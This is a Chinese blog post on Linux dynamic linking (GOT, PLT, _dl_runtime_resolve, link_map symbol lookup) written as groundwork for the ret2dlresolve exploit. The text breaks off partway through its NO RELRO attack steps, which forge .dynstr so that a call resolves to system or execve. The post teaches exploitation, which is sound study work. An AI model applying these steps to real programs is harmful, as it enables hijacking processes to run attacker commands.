

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/image/favicon.png">
  <link rel="icon" href="/image/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="bladchan">
  <meta name="keywords" content="">
  
    <meta name="description" content="Ret2dlresolve攻击解析（Linux动态链接原理） 本文尝试使用问题驱动作为行文思路的方式，使用问答的方式一步一步剖析Linux动态链接原理，并解析ret2dlresolve攻击方法  Q1：什么是动态链接？ 把链接这个过程推迟到了运行时再进行，在可执行文件装载时或运行时，由操作系统的装载程序加载库  Q2：为什么需要动态链接？ 解决静态链接的空间浪费和更新困难问题  Q3：动态链接的实">
<meta property="og:type" content="article">
<meta property="og:title" content="Ret2dlresolve攻击解析">
<meta property="og:url" content="http://bladchan.github.io/2023/10/13/Ret2dlresolve%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/index.html">
<meta property="og:site_name" content="chan&#39;s blog">
<meta property="og:description" content="Ret2dlresolve攻击解析（Linux动态链接原理） 本文尝试使用问题驱动作为行文思路的方式，使用问答的方式一步一步剖析Linux动态链接原理，并解析ret2dlresolve攻击方法  Q1：什么是动态链接？ 把链接这个过程推迟到了运行时再进行，在可执行文件装载时或运行时，由操作系统的装载程序加载库  Q2：为什么需要动态链接？ 解决静态链接的空间浪费和更新困难问题  Q3：动态链接的实">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://bladchan.github.io/image/ret2dlresolve.png">
<meta property="article:published_time" content="2023-10-13T09:44:12.000Z">
<meta property="article:modified_time" content="2023-10-13T10:10:24.532Z">
<meta property="article:author" content="bladchan">
<meta property="article:tag" content="栈溢出漏洞利用">
<meta property="article:tag" content="ret2dlresolve">
<meta property="article:tag" content="linux动态链接">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://bladchan.github.io/image/ret2dlresolve.png">
  
  
  
  <title>Ret2dlresolve攻击解析 - chan&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"bladchan.github.io","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Chan&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Ret2dlresolve攻击解析"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-10-13 17:44" pubdate>
          2023年10月13日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          17k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          143 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Ret2dlresolve攻击解析</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="Ret2dlresolve攻击解析（Linux动态链接原理）"><a href="#Ret2dlresolve攻击解析（Linux动态链接原理）" class="headerlink" title="Ret2dlresolve攻击解析（Linux动态链接原理）"></a>Ret2dlresolve攻击解析（Linux动态链接原理）</h1><ul>
<li>本文尝试使用<strong>问题驱动</strong>作为行文思路的方式，使用问答的方式一步一步剖析Linux动态链接原理，并解析<code>ret2dlresolve</code>攻击方法</li>
</ul>
<h2 id="Q1：什么是动态链接？"><a href="#Q1：什么是动态链接？" class="headerlink" title="Q1：什么是动态链接？"></a>Q1：什么是动态链接？</h2><ul>
<li>把链接这个过程<strong>推迟</strong>到了<strong>运行时再进行</strong>，在可执行文件装载时或运行时，由操作系统的装载程序加载库</li>
</ul>
<h2 id="Q2：为什么需要动态链接？"><a href="#Q2：为什么需要动态链接？" class="headerlink" title="Q2：为什么需要动态链接？"></a>Q2：为什么需要动态链接？</h2><ul>
<li>解决静态链接的空间浪费和更新困难问题</li>
</ul>
<h2 id="Q3：动态链接的实现？"><a href="#Q3：动态链接的实现？" class="headerlink" title="Q3：动态链接的实现？"></a>Q3：动态链接的实现？</h2><ul>
<li><p>Linux：<code>.so</code>；Windows：<code>.dll</code></p>
</li>
<li><p>共享的是<strong>代码</strong>，私有的是数据</p>
</li>
<li><p>共享对象的最终装载地址在编译时是不确定的，而是在装载时，<strong>装载器根据当前地址空间的空闲情况，动态分配一块足够大小的虚拟地址空间给相应的共享对象</strong></p>
</li>
</ul>
<h2 id="Q4：动态链接对象共享难题？"><a href="#Q4：动态链接对象共享难题？" class="headerlink" title="Q4：动态链接对象共享难题？"></a>Q4：动态链接对象共享难题？</h2><ul>
<li><p>指令部分有两个地方需要在装载时确定</p>
<ul>
<li>一是指令访问其他模块的数据。如果其他模块的数据的地址需要再装载时才能确定，这就必须修改指令中的地址</li>
<li>二是指令中调用其他模块的函数</li>
</ul>
</li>
<li><p>解决方法：<strong>全局偏移表 GOT（global offset table）</strong></p>
</li>
</ul>
<h2 id="Q5：GOT？"><a href="#Q5：GOT？" class="headerlink" title="Q5：GOT？"></a>Q5：GOT？</h2><ul>
<li>数据段中的一个指针数组：<ul>
<li><strong>存储</strong>：存放跨模块的数据/函数的地址</li>
<li><strong>动态修改</strong>：在装载时动态填入</li>
<li><strong>访问</strong>：通过GOT的指针间接访问</li>
</ul>
</li>
<li>说白了GOT是所有需要动态装载模块的一个wrapper，是一个存放具体跳转地址的指针</li>
<li>在ELF中，<code>.got</code>用来保存全局变量引用的地址，<code>.got.plt</code>用来保存函数引用的地址</li>
</ul>
<h2 id="Q6：x86-PLT过程？"><a href="#Q6：x86-PLT过程？" class="headerlink" title="Q6：x86 PLT过程？"></a>Q6：x86 PLT过程？</h2><p>PLT基本流程：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs assembly">/** csapp中GOT指的是（.got.plt + got）**/<br>  PLT[0]:		  # 被所有的.plt实体所共享<br>  push *(GOT+4)	  # 4.将Module ID（GOT[1]）压入栈<br>  jmp  *(GOT+8)   # 5.调用_dl_runtime_resolve()（GOT[2]），根据id+n完成符号解析与重定位，并将解析地址填入到bar@GOT中（也就是下次就不需要解析了）<br>  ...<br>  ...<br>  bar@plt( PLT[n] ):<br>  jmp  *(bar@GOT)  # 1.如果符号已绑定，则跳转到符号位置；如果未绑定，则跳转到下面<br>  push n		   # 2.将符号在重定位表中的下标压入栈<br>  jmp PLT0		   # 3.跳转到PLT0处<br></code></pre></td></tr></tbody></table></figure>

<p>一句话描述：PLT首先会查找<code>.got.plt</code>节（GOT）。如果GOT找不到符号地址（主要由于延迟绑定 lazy-binding），那么PLT将会调用一个动态加载器中的函数<code>_dl_runtime_resolve()</code>：</p>
<ul>
<li>在主ELF镜像的<code>.dynstr</code>节中找到NULL为终结符的字符串<code>puts\0</code></li>
<li>然后在所有加载的共享目标中找到<code>puts</code>的地址（如<code>libc.so.6</code>）</li>
</ul>
<p>e.g.</p>
<p><img src="/2023/10/13/Ret2dlresolve%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/1.png" srcset="/img/loading.gif" lazyload></p>
<p>在执行完<code>_dl_runtime_resolve()</code>函数之后<code>read@GOT</code>的数据就被修改为装载到堆上的地址，即</p>
<p><img src="/2023/10/13/Ret2dlresolve%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/2.png" srcset="/img/loading.gif" lazyload></p>
<p>Q7：<code>.got.plt</code>？</p>
<ul>
<li><code>.got.plt</code>前面三项：</li>
</ul>
<figure class="highlight text"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs text">------------------------<br>.dynamic段地址<br>------------------------<br>本模块ID<br>------------------------<br>_dl_runtime_resolve()地址<br>------------------------<br>导入函数1<br>------------------------<br>导入函数2<br>------------------------<br>...<br>------------------------<br></code></pre></td></tr></tbody></table></figure>

<ul>
<li>在GDB中，我们可以看到<code>.got.plt</code>第一个导入函数的地址为<code>0x80498c4</code>：</li>
</ul>
<p><img src="/2023/10/13/Ret2dlresolve%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/3.png" srcset="/img/loading.gif" lazyload></p>
<p>根据前面<code>.got.plt</code>的结构，我们可以知晓Module ID地址为<code>0x80498bc</code>，<code>_dl_runtime_resolve()</code>地址为<code>0x80498c0</code></p>
<h2 id="Q7：-dl-runtime-resolve-？"><a href="#Q7：-dl-runtime-resolve-？" class="headerlink" title="Q7：_dl_runtime_resolve()？"></a>Q7：<code>_dl_runtime_resolve()</code>？</h2><p><code>_dl_runtime_resolve()</code>函数有两个参数，一个是<code>link_map</code>，在本例中为<code>0xf7ffd940</code>，而另一个参数是<code>reloc_index</code>，在本例中为<code>0x8</code>。请注意，这两个参数都是存放在栈中的，由于当前环境为x86，参数是存放在栈上的；但当环境为x64时，<strong>这两个参数仍然是存放在栈中的</strong>，原因也很简单，因为<code>rdi, rsi, rdx(rcx, r8, r9...)</code>现在存放的是被调函数的参数，为了减少额外的保护现场汇编码，这里直接将参数入栈处理。</p>
<p><code>_dl_runtime_resolve(link_map, reloc_index)</code>做了如下的事：</p>
<ul>
<li>找到目标函数名以NULL截断的字符串（如”read”）；</li>
<li>在所有已经载入的库（共享目标）中寻找该地址；</li>
<li>将该地址写回<strong>GOT</strong>（即将找到的地址填入<a href="mailto:read@got.plt">read@got.plt</a>中）；</li>
<li>跳转到<code>read()</code>并执行。</li>
</ul>
<p>这里存在一个问题，就是目标函数名是如何找到的？我们将在下一问中进行解答。</p>
<h2 id="Q8：寻找的函数名是如何确定的？"><a href="#Q8：寻找的函数名是如何确定的？" class="headerlink" title="Q8：寻找的函数名是如何确定的？"></a>Q8：寻找的函数名是如何确定的？</h2><p>总体寻址流程[3]：</p>
<p><img src="/2023/10/13/Ret2dlresolve%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/4.png" srcset="/img/loading.gif" lazyload></p>
<hr>
<p>细节：</p>
<p><strong>.dynamic段：</strong></p>
<ul>
<li><p>存放<code>.dynsym</code>和<code>.dynstr</code>地址</p>
</li>
<li><p>存放<code>Elf_Dyn</code>实体：</p>
<figure class="highlight c"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">typedef</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> {</span><br>  Elf32_Sword d_tag;<br>  <span class="hljs-class"><span class="hljs-keyword">union</span> {</span><br>    Elf32_Word d_val;<br>    Elf32_Addr d_ptr;<br>  } d_un;<br>} Elf32_Dyn;<br><br><span class="hljs-comment">// x64</span><br><span class="hljs-keyword">typedef</span> <span class="hljs-class"><span class="hljs-keyword">struct</span></span><br><span class="hljs-class">{</span><br>  Elf64_Sxword d_tag;                        <span class="hljs-comment">/* Dynamic entry type */</span><br>  <span class="hljs-class"><span class="hljs-keyword">union</span></span><br><span class="hljs-class">    {</span><br>      Elf64_Xword d_val;                     <span class="hljs-comment">/* Integer value */</span><br>      Elf64_Addr  d_ptr;                     <span class="hljs-comment">/* Address value */</span><br>    } d_un;<br>} Elf64_Dyn;<br></code></pre></td></tr></tbody></table></figure></li>
</ul>
<p><strong>link_map.l_info</strong>：</p>
<ul>
<li>动态加载器存储这些实体的结构体（<code>link_map</code>结构体成员很多[4]，我们仅需关注<code>l_info</code>）</li>
<li>定义：</li>
</ul>
<figure class="highlight applescript"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs applescript">struct link_map<br>  {<br>...    <br>    /* Indexed pointers <span class="hljs-keyword">to</span> dynamic section.<br>       [<span class="hljs-number">0</span>,DT_NUM) are indexed <span class="hljs-keyword">by</span> <span class="hljs-keyword">the</span> processor-independent tags.<br>       [DT_NUM,DT_NUM+DT_THISPROCNUM) are indexed <span class="hljs-keyword">by</span> <span class="hljs-keyword">the</span> tag minus DT_LOPROC.<br>       [DT_NUM+DT_THISPROCNUM,DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM) are indexed <span class="hljs-keyword">by</span> DT_VERSIONTAGIDX(tagvalue).<br>       [DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM, DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM+DT_EXTRANUM) are indexed <span class="hljs-keyword">by</span> DT_EXTRATAGIDX(tagvalue).<br>       [DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM+DT_EXTRANUM, DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM+DT_EXTRANUM+DT_VALNUM) are indexed <span class="hljs-keyword">by</span> DT_VALTAGIDX(tagvalue) <span class="hljs-keyword">and</span><br>       [DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM+DT_EXTRANUM+DT_VALNUM, DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM+DT_EXTRANUM+DT_VALNUM+DT_ADDRNUM) are indexed <span class="hljs-keyword">by</span> DT_ADDRTAGIDX(tagvalue), see &lt;elf.h&gt;.  */<br>    ElfW(Dyn) *l_info[DT_NUM + DT_THISPROCNUM + DT_VERSIONTAGNUM + DT_EXTRANUM + DT_VALNUM + DT_ADDRNUM];<br>...<br></code></pre></td></tr></tbody></table></figure>

<p>d_tag (dynamic entry type) 定义在<code>elf/elf.h</code>[5]中：</p>
<figure class="highlight c"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-comment">/* Legal values for d_tag (dynamic entry type).  */</span><br>...<br><span class="hljs-meta">#<span class="hljs-keyword">define</span> DT_STRTAB	5		<span class="hljs-comment">/* Address of string table (.dynstr) */</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> DT_SYMTAB	6		<span class="hljs-comment">/* Address of symbol table (.dynsym) */</span></span><br>...<br><span class="hljs-meta">#<span class="hljs-keyword">define</span> DT_JMPREL	23		<span class="hljs-comment">/* Address of PLT relocs (.plt.dyn) */</span></span><br></code></pre></td></tr></tbody></table></figure>

<p>在Q6中，<code>PLT[0]</code>是有将Module ID的值压入堆栈，而该值就是link_map：</p>
<p><img src="/2023/10/13/Ret2dlresolve%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/5.png" srcset="/img/loading.gif" lazyload></p>
<p>那link_map到l_info的偏移值是多少呢？A：+8 * 位长（x86：4；x64：8）</p>
<figure class="highlight cpp"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-keyword">struct</span> <span class="hljs-title class_">link_map</span><br>  {<br>    <span class="hljs-comment">/* These first few members are part of the protocol with the debugger.</span><br><span class="hljs-comment">       This is the same format used in SVR4.  */</span><br>    <span class="hljs-built_in">ElfW</span>(Addr) l_addr;		<span class="hljs-comment">/* Difference between the address in the ELF</span><br><span class="hljs-comment">				   file and the addresses in memory.  */</span><br>    <span class="hljs-type">char</span> *l_name;		<span class="hljs-comment">/* Absolute file name object was found in.  */</span><br>    <span class="hljs-built_in">ElfW</span>(Dyn) *l_ld;		<span class="hljs-comment">/* Dynamic section of the shared object.  */</span><br>    <span class="hljs-keyword">struct</span> <span class="hljs-title class_">link_map</span> *l_next, *l_prev; <span class="hljs-comment">/* Chain of loaded objects.  */</span><br>    <span class="hljs-comment">/* All following members are internal to the dynamic linker.</span><br><span class="hljs-comment">       They may change without notice.  */</span><br>    <span class="hljs-comment">/* This is an element which is only ever different from a pointer to</span><br><span class="hljs-comment">       the very same copy of this type for ld.so when it is used in more</span><br><span class="hljs-comment">       than one namespace.  */</span><br>    <span class="hljs-keyword">struct</span> <span class="hljs-title class_">link_map</span> *l_real;<br>    <span class="hljs-comment">/* Number of the namespace this link map belongs to.  */</span><br>    Lmid_t l_ns;<br>    <span class="hljs-keyword">struct</span> <span class="hljs-title class_">libname_list</span> *l_libname;<br>    <span class="hljs-built_in">ElfW</span>(Dyn) *l_info[DT_NUM + DT_THISPROCNUM + DT_VERSIONTAGNUM<br>		    + DT_EXTRANUM + DT_VALNUM + DT_ADDRNUM];<br></code></pre></td></tr></tbody></table></figure>

<p>即l_info的地址为<code>link_map + 8 * (4/8)</code>，那么有：</p>
<table>
<thead>
<tr>
<th>Member</th>
<th>Address</th>
</tr>
</thead>
<tbody><tr>
<td><code>link_map-&gt;l_info[DT_STRTAB]</code></td>
<td>link_map_base + (8 + 5 = 13) * (4/8)</td>
</tr>
<tr>
<td><code>link_map-&gt;l_info[DT_SYMTAB]</code></td>
<td>link_map_base + (8 + 6 = 14) * (4/8)</td>
</tr>
<tr>
<td><code>link_map-&gt;l_info[DT_JMPREL]</code></td>
<td>link_map_base + (8 + 23 = 31) * (4/8)</td>
</tr>
</tbody></table>
<p><img src="/2023/10/13/Ret2dlresolve%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/6.png" srcset="/img/loading.gif" lazyload></p>
<p>然后我们可以查看<code>.dynstr</code>存放的数据，如下所示：</p>
<p><img src="/2023/10/13/Ret2dlresolve%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/7.png" srcset="/img/loading.gif" lazyload></p>
<hr>
<p>至此，我们得到了<code>.rel.plt</code>、<code>.dynstr</code>和<code>.dynsym</code>的地址。接下来，我们根据上述的寻址流程一步一步找到对应的函数名：</p>
<p><img src="/2023/10/13/Ret2dlresolve%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/4.png" srcset="/img/loading.gif" lazyload></p>
<p>如前所述，<code>reloc_index</code>在此例中为<code>0x8</code>。那么<code>read</code>函数<code>Elf_Rel</code>结构体的地址为<code>0x08048304 + 8 = 0x804830c</code>，即</p>
<p><img src="/2023/10/13/Ret2dlresolve%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/9.png" srcset="/img/loading.gif" lazyload></p>
<p>这里显然<code>0x080498c8</code>为<code>r_offset</code>，而<code>0x207</code>为<code>r_info</code>，</p>
<figure class="highlight c"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-comment">// glibc/elf/elf.h</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> ELF32_R_SYM(val)		((val) &gt;&gt; 8)</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> ELF32_R_TYPE(val)		((val) &amp; 0xff)</span><br></code></pre></td></tr></tbody></table></figure>

<p>因此，<code>read</code>对应的<code>Elf_SYM</code>结构体在<code>.dynsym</code>的偏移为<code>ELF32_R_SYM(r_info)= 0x207 &gt;&gt; 8 = 2 </code></p>
<figure class="highlight c"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">typedef</span> <span class="hljs-class"><span class="hljs-keyword">struct</span></span><br><span class="hljs-class">{</span><br>  Elf32_Word	st_name;		<span class="hljs-comment">/* Symbol name (string tbl index) (16 bits)*/</span><br>  Elf32_Addr	st_value;		<span class="hljs-comment">/* Symbol value (16 bits)*/</span><br>  Elf32_Word	st_size;		<span class="hljs-comment">/* Symbol size (16 bits)*/</span><br>  <span class="hljs-type">unsigned</span> <span class="hljs-type">char</span>	st_info;		<span class="hljs-comment">/* Symbol type and binding (8 bits)*/</span><br>  <span class="hljs-type">unsigned</span> <span class="hljs-type">char</span>	st_other;		<span class="hljs-comment">/* Symbol visibility (8 bits) */</span><br>  Elf32_Section	st_shndx;		<span class="hljs-comment">/* Section index (16 bits)*/</span><br>} Elf32_Sym;<br></code></pre></td></tr></tbody></table></figure>

<p>而<code>sizeof(struct Elf32_Sym)=4*4=0x10</code>（注意这里结构体内存对齐），那么对应<code>Elf_SYM</code>结构体的起始位置为<code>0x080481ac + 0x10 * 0x2 = 0x80481cc</code>，则有</p>
<p><img src="/2023/10/13/Ret2dlresolve%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/10.png" srcset="/img/loading.gif" lazyload></p>
<p><span class="github-emoji"><span>🤔</span><img src="https://github.githubassets.com/images/icons/emoji/unicode/1f914.png?v8" srcset="/img/loading.gif" lazyload aria-hidden="true" onerror="this.parent.classList.add('github-emoji-fallback')"></span> 哎嘿，这里居然不是地址吗？那这里<code>0x5c</code>是个啥玩意？？我们不妨猜测一下，该地址是搜索字符串在<code>.dynstr</code>的偏移值？我们来验证一下：</p>
<p><img src="/2023/10/13/Ret2dlresolve%E6%94%BB%E5%87%BB%E8%A7%A3%E6%9E%90/11.png" srcset="/img/loading.gif" lazyload></p>
<p>这样一来，我们就得到了函数名，然后链接器将在所有加载的共享代码中找到包含该字符串的函数地址，并将该地址填入GOT表中。</p>
<h2 id="Q9：X86-Ret2dlresolve"><a href="#Q9：X86-Ret2dlresolve" class="headerlink" title="Q9：X86 Ret2dlresolve"></a>Q9：X86 Ret2dlresolve</h2><h3 id="NO-RELRO"><a href="#NO-RELRO" class="headerlink" title="NO RELRO"></a>NO RELRO</h3><p>NO RELRO，顾名思义，不开启重定向只读保护（<code>.dynamic</code>可读可写），即<code>.dynamic</code>可以被修改。</p>
<p>对于关闭RELRO的程序来说，最简单的利用方法是修改<code>link_map</code>中的<code>.dynstr</code>的地址。<span class="github-emoji"><span>⭐</span><img src="https://github.githubassets.com/images/icons/emoji/unicode/2b50.png?v8" srcset="/img/loading.gif" lazyload aria-hidden="true" onerror="this.parent.classList.add('github-emoji-fallback')"></span> 需要注意的是，修改<code>.dynstr</code>能够成功进行攻击的最根本原因是：<strong>动态链接器根据偏移进行寻址</strong>（很显然不能使用固定的地址寻址，原因是PIE机制会修改程序载入的基址）。</p>
<p><span class="github-emoji"><span>⭐</span><img src="https://github.githubassets.com/images/icons/emoji/unicode/2b50.png?v8" srcset="/img/loading.gif" lazyload aria-hidden="true" onerror="this.parent.classList.add('github-emoji-fallback')"></span> NO RELRO攻击的具体流程如下：</p>
<ol>
<li>在可写内存中构造一个虚假的<code>.dynstr</code>区（将某一函数的字符串替换为另外一个函数，如system、execve等）；</li>
<li>然后调用写函数将<code>link_map</code>中的存放<code>.dynstr</code>的成员变量替换为上述构造的虚假<code>.dynstr</code>区地址；</li>
<li><strong>将原函数的GOT的跳转地址修改为PLT的下一条指令地址</strong>（<strong>这里也可以直接RET到PLT的下一条指令</strong>）</li>
